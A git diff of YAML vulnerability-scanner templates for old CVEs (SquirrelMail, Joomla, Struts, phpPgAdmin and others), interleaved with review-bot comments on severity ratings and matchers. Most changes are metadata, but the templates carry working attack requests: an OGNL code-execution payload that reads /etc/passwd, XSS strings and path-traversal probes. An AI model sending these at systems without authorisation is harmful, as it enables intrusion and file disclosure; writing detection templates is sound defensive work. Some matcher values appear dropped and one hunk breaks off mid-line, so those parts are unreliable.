@@ -3,24 +3,26 @@ id: CVE-2002-1131 info: name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting author: dhiyaneshDk - severity: medium + severity: high description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. reference: - http://www.redhat.com/support/errata/RHSA-2002-204.html - http://www.debian.org/security/2002/dsa-191 - http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774 - https://www.exploit-db.com/exploits/21811 - - https://web.archive.org/web/20051124131714/http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html - - http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/ - https://nvd.nist.gov/vuln/detail/CVE-2002-1131 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cwe-id: CWE-80 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2002-1131 - tags: cve2002,edb,xss,squirrelmail,cve + cwe-id: CWE-80 + epss-score: 0.06018 + cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 5 + vendor: squirrelmail + product: squirrelmail + tags: cve2002,edb,xss,squirrelmail,cve http: - method: GET @@ -32,12 +34,9 @@ http: - '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' stop-at-first-match: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -47,3 +46,7 @@ http: part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index 76318a710c..1de7475149 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml 
@@ -8,16 +8,22 @@ info: reference: - https://www.exploit-db.com/exploits/24068 - http://security.gentoo.org/glsa/glsa-200405-16.xml - - http://web.archive.org/web/20210209233941/https://www.securityfocus.com/archive/1/361857 + - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc + - http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000858 + - http://marc.info/?l=bugtraq&m=108334862800260 remediation: Upgrade to the latest version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2004-0519 cwe-id: NVD-CWE-Other - tags: squirrelmail,cve2004,cve,edb,xss + epss-score: 0.02285 + cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: sgi + product: propack + tags: squirrelmail,cve2004,cve,edb,xss http: - method: GET @@ -26,10 +32,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -39,3 +41,7 @@ http: part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index 31000bcb59..8236b3fc1f 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -9,14 +9,19 @@ info: reference: - https://www.exploit-db.com/exploits/24055 - https://nvd.nist.gov/vuln/detail/CVE-2004-1965 + - http://marc.info/?l=bugtraq&m=108301983206107&w=2 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/15966 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other + epss-score: 0.0113 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: openbb + product: openbb tags: cve,cve2004,redirect,xss,openbb http: diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index ab021aa862..d3011ef96d 100644 --- a/http/cves/2005/CVE-2005-2428.yaml 
+++ b/http/cves/2005/CVE-2005-2428.yaml @@ -9,27 +9,35 @@ info: - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - https://www.exploit-db.com/exploits/39495 - https://nvd.nist.gov/vuln/detail/CVE-2005-2428 + - http://marc.info/?l=bugtraq&m=112240869130356&w=2 + - http://securitytracker.com/id?1014584 remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2005-2428 cwe-id: CWE-200 - tags: domino,edb,cve,cve2005 + epss-score: 0.01188 + cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ibm + product: lotus_domino + tags: domino,edb,cve,cve2005 http: - method: GET path: - "{{BaseURL}}/names.nsf/People?OpenView" + matchers-condition: and matchers: + - type: regex + name: domino-username + part: body + regex: + - '(Horde :: User Administration" diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 5a95371b7c..3be084b3d8 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -14,14 +14,17 @@ info: - https://exchange.xforce.ibmcloud.com/vulnerabilities/23031 - https://nvd.nist.gov/vuln/detail/CVE-2005-3634 classification: - cvss-metrics: CVSS:2.0/(AV:N/AC:L/Au:N/C:N/I:P/A:N) - cvss-score: 5.0 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N + cvss-score: 5 cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other - cpe: cpe:2.3:a:sap:sap_web_application_server:7.0:*:*:*:*:*:*:* + epss-score: 0.02843 + cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"SAP Business Server Pages Team" + vendor: sap + product: sap_web_application_server tags: cve,cve2005,sap,redirect,business http: 
diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 3ab648d6c7..53ef9e9d0e 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -7,16 +7,20 @@ info: description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. reference: - http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html - - http://web.archive.org/web/20210121165100/https://www.securityfocus.com/bid/15940/ - https://nvd.nist.gov/vuln/detail/CVE-2005-4385 + - http://www.vupen.com/english/advisories/2005/2977 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2005-4385 cwe-id: NVD-CWE-Other - tags: cofax,xss,cve,cve2005 + epss-score: 0.00294 + cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cofax + product: cofax + tags: cofax,xss,cve,cve2005 http: - method: GET @@ -25,10 +29,11 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: body words: - "'>\"" + + - type: status + status: + - 200 diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index a6782a8f05..0cb4e34c71 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml 
@@ -6,18 +6,22 @@ info: severity: medium description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. reference: - - http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/ - - http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/ - http://www.vupen.com/english/advisories/2006/1292 - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/25698 + - https://security.gentoo.org/glsa/202012-09 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2006-1681 cwe-id: NVD-CWE-Other - tags: cherokee,httpd,xss,cve,cve2006 + epss-score: 0.01015 + cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cherokee + product: cherokee_httpd + tags: cherokee,httpd,xss,cve,cve2006 http: - method: GET @@ -26,9 +30,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - "" @@ -37,3 +38,7 @@ http: part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 12eac06b68..df57a144c1 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml 
@@ -9,16 +9,20 @@ info: - https://www.exploit-db.com/exploits/27948 - http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE - http://www.squirrelmail.org/security/issue/2006-06-01 - - http://web.archive.org/web/20160915101900/http://secunia.com/advisories/20406/ - https://nvd.nist.gov/vuln/detail/CVE-2006-2842 + - ftp://patches.sgi.com/support/free/security/advisories/20060703-01-U.asc classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2006-2842 cwe-id: CWE-22 - tags: cve,cve2006,lfi,squirrelmail,edb + epss-score: 0.2925 + cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: squirrelmail + product: squirrelmail + tags: cve,cve2006,lfi,squirrelmail,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 37078a7418..646e83cddf 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml 
@@ -6,18 +6,20 @@ info: severity: medium description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter. reference: - - http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded - - https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503 - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418 - https://nvd.nist.gov/vuln/detail/CVE-2007-0885 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other - cvss-score: 6.8 - tags: cve,cve2007,jira,xss + epss-score: 0.00694 + cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rainbow_portal + product: rainbow.zen + tags: cve,cve2007,jira,xss http: - method: GET @@ -30,11 +32,11 @@ http: words: - '">' - - type: status - status: - - 200 - - type: word part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 9ec9e40713..55d094a781 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml 
@@ -3,20 +3,24 @@ id: CVE-2007-4504 info: name: Joomla! RSfiles <=1.0.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. reference: - https://www.exploit-db.com/exploits/4307 - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222 - https://nvd.nist.gov/vuln/detail/CVE-2007-4504 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2007-4504 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2007,joomla + epss-score: 0.01677 + cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: rsfiles + tags: lfi,edb,cve,cve2007,joomla http: - method: GET @@ -25,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 31e15e5651..277a1a6504 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -3,7 +3,7 @@ id: CVE-2007-4556 info: name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution author: pikpikcu - severity: critical + severity: medium description: | Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. reference: 
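Review bot: Downgrading `severity` from `critical` to `medium` in the CVE-2007-4556 hunk leaves the template at odds with its own `name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution` and with the description's statement that remote attackers can execute arbitrary code. The new value apparently tracks the CVSS 2.0 base score of 6.8 kept in the following hunk, but `severity` is the field users filter on (`-severity critical,high`), so an unauthenticated RCE check rated medium is skipped in precisely the runs where it matters; I'd keep `severity: critical`, or at least `high`, and let `cvss-score` carry the numeric value. The same score-driven downgrade is worth a second look in the CVE-2007-4504 hunk earlier on this line, which moves a path-traversal file read from high to medium.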
@@ -11,31 +11,37 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2007-4556 - https://cwiki.apache.org/confluence/display/WW/S2-001 - http://forums.opensymphony.com/ann.jspa?annID=54 + - http://issues.apache.org/struts/browse/WW-2030 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2007-4556 cwe-id: NVD-CWE-Other - tags: cve,cve2007,apache,rce,struts + epss-score: 0.14147 + cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: opensymphony + product: xwork + tags: cve,cve2007,apache,rce,struts http: - method: POST path: - "{{BaseURL}}/login.action" - headers: - Content-Type: application/x-www-form-urlencoded + body: | username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 1ca72229dc..b83512040f 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml 
@@ -8,17 +8,21 @@ info: reference: - https://www.exploit-db.com/exploits/30090 - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html - - http://web.archive.org/web/20210130131735/https://www.securityfocus.com/bid/24182/ - - http://web.archive.org/web/20161220160642/http://secunia.com/advisories/25446/ - https://nvd.nist.gov/vuln/detail/CVE-2007-5728 + - http://www.debian.org/security/2008/dsa-1693 + - http://www.novell.com/linux/security/advisories/2007_24_sr.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2007-5728 cwe-id: CWE-79 + epss-score: 0.03308 + cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"phpPgAdmin" + vendor: phppgadmin + product: phppgadmin tags: cve,cve2007,xss,pgadmin,phppgadmin,edb http: @@ -28,16 +32,15 @@ http: matchers-condition: and matchers: - - type: word words: - '' - - type: status - status: - - 200 - - type: word part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index ca6101e405..c1db177cb9 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml 
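Review bot: In the second CVE-2007-5728 hunk the reordered word matcher reads `words: - ''` as rendered here, and the same empty value appears in the new word matchers added for CVE-2008-2398 and CVE-2009-1872. If the checked-in files really hold an empty string rather than a payload lost in this rendering, that matcher matches every response and the `and` condition degenerates to a text/html plus 200 check, producing a hit on any live host. Confirm that the expected reflected string is present in all three files; if it is, this rendering simply dropped it.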
@@ -10,15 +10,20 @@ info: - https://www.exploit-db.com/exploits/5194 - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881 - https://nvd.nist.gov/vuln/detail/CVE-2008-1059 - - https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/ + - http://securityreason.com/securityalert/3706 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/40829 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2008-1059 - cwe-id: CWE-79 - tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan + cwe-id: CWE-94 + epss-score: 0.01493 + cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wordpress + product: sniplets_plugin + tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan http: - method: GET diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 38db66918d..9778fb65f2 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -3,7 +3,7 @@ id: CVE-2008-1061 info: name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting author: dhiyaneshDK - severity: high + severity: medium description: | WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php. reference: 
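Review bot: The moved `tags: lfi,cve,cve2008,wordpress,...` line for CVE-2008-1059 now sits next to a `cwe-id` changed to CWE-94 (code injection) and a CVSSv2 vector with C:P/I:P/A:P, so the `lfi` tag appears to describe a different weakness class than the classification. Tag-based template selection and CWE-based classification should agree; either the CWE or the tag presumably needs reconciling, which can be decided from the request path, which lies outside this hunk.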
@@ -11,14 +11,19 @@ info: - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881 - https://nvd.nist.gov/vuln/detail/CVE-2008-1061 - http://securityreason.com/securityalert/3706 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/40830 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-1061 cwe-id: CWE-79 - tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets + epss-score: 0.00938 + cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wordpress + product: sniplets_plugin + tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets http: - method: GET diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index bc9e0ebac4..e290bc9c53 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -9,16 +9,20 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2008-1547 - https://www.exploit-db.com/exploits/32489 - - https://www.securityfocus.com/bid/31765/info + - http://securityreason.com/securityalert/4441 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/46061 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2008-1547 cwe-id: CWE-601 + epss-score: 0.03523 cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.title:"Outlook" + vendor: microsoft + product: exchange_server tags: cve,cve2008,redirect,owa,exchange,microsoft http: diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index f9518c8659..b214ef291f 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml 
@@ -7,18 +7,20 @@ info: description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. reference: - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 - - http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/ - - http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/ - http://securityreason.com/securityalert/3896 - https://nvd.nist.gov/vuln/detail/CVE-2008-2398 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-2398 cwe-id: CWE-79 - cvss-score: 4.3 - tags: cve,cve2008,xss + epss-score: 0.00329 + cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: appserv_open_project + product: appserv + tags: cve,cve2008,xss http: - method: GET @@ -27,15 +29,16 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index b236309e78..22c20eea92 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml 
@@ -3,22 +3,27 @@ id: CVE-2008-2650 info: name: CMSimple 3.1 - Local File Inclusion author: pussycat0x - severity: high + severity: medium description: | CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. reference: - http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17 - - http://web.archive.org/web/20210121182016/https://www.securityfocus.com/bid/29450/ - http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463 - https://nvd.nist.gov/vuln/detail/CVE-2008-2650 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42792 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42793 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2008-2650 cwe-id: CWE-22 - tags: cve,cve2008,lfi,cmsimple + epss-score: 0.06344 + cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cmsimple + product: cmsimple + tags: cve,cve2008,lfi,cmsimple http: - raw: @@ -29,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 40c1a5e8e4..1a768681fa 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml 
@@ -3,21 +3,25 @@ id: CVE-2008-4668 info: name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion author: daffainfo - severity: high + severity: critical description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. reference: - https://www.exploit-db.com/exploits/6618 - - http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/ - http://securityreason.com/securityalert/4464 - https://nvd.nist.gov/vuln/detail/CVE-2008-4668 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/45490 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:P/A:P cvss-score: 9 cve-id: CVE-2008-4668 cwe-id: CWE-22 - tags: cve,cve2008,joomla,lfi,edb + epss-score: 0.01018 + cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: com_imagebrowser + tags: cve,cve2008,joomla,lfi,edb http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 94fcea035c..fc77b5f39e 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml 
@@ -3,21 +3,24 @@ id: CVE-2008-4764 info: name: Joomla! <=2.0.0 RC2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. reference: - https://www.exploit-db.com/exploits/5435 - - http://web.archive.org/web/20210121181347/https://www.securityfocus.com/bid/28764/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873 - https://nvd.nist.gov/vuln/detail/CVE-2008-4764 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2008-4764 cwe-id: CWE-22 - tags: edb,cve,cve2008,joomla,lfi + epss-score: 0.00779 + cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* metadata: max-request: 1 + vendor: extplorer + product: com_extplorer + tags: edb,cve,cve2008,joomla,lfi http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 4a67130c8a..8d2bbdc149 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml 
@@ -7,18 +7,22 @@ info: description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php. reference: - https://www.exploit-db.com/exploits/7363 - - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ - - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 - - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 - https://nvd.nist.gov/vuln/detail/CVE-2008-5587 + - http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html + - http://lists.opensuse.org/opensuse-updates/2012-04/msg00033.html + - http://securityreason.com/securityalert/4737 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2008-5587 cwe-id: CWE-22 + epss-score: 0.02331 + cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"phpPgAdmin" + vendor: phppgadmin + product: phppgadmin tags: cve,cve2008,lfi,phppgadmin,edb http: @@ -28,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index 81e9ea2ee5..16ef73ee8d 100644 --- 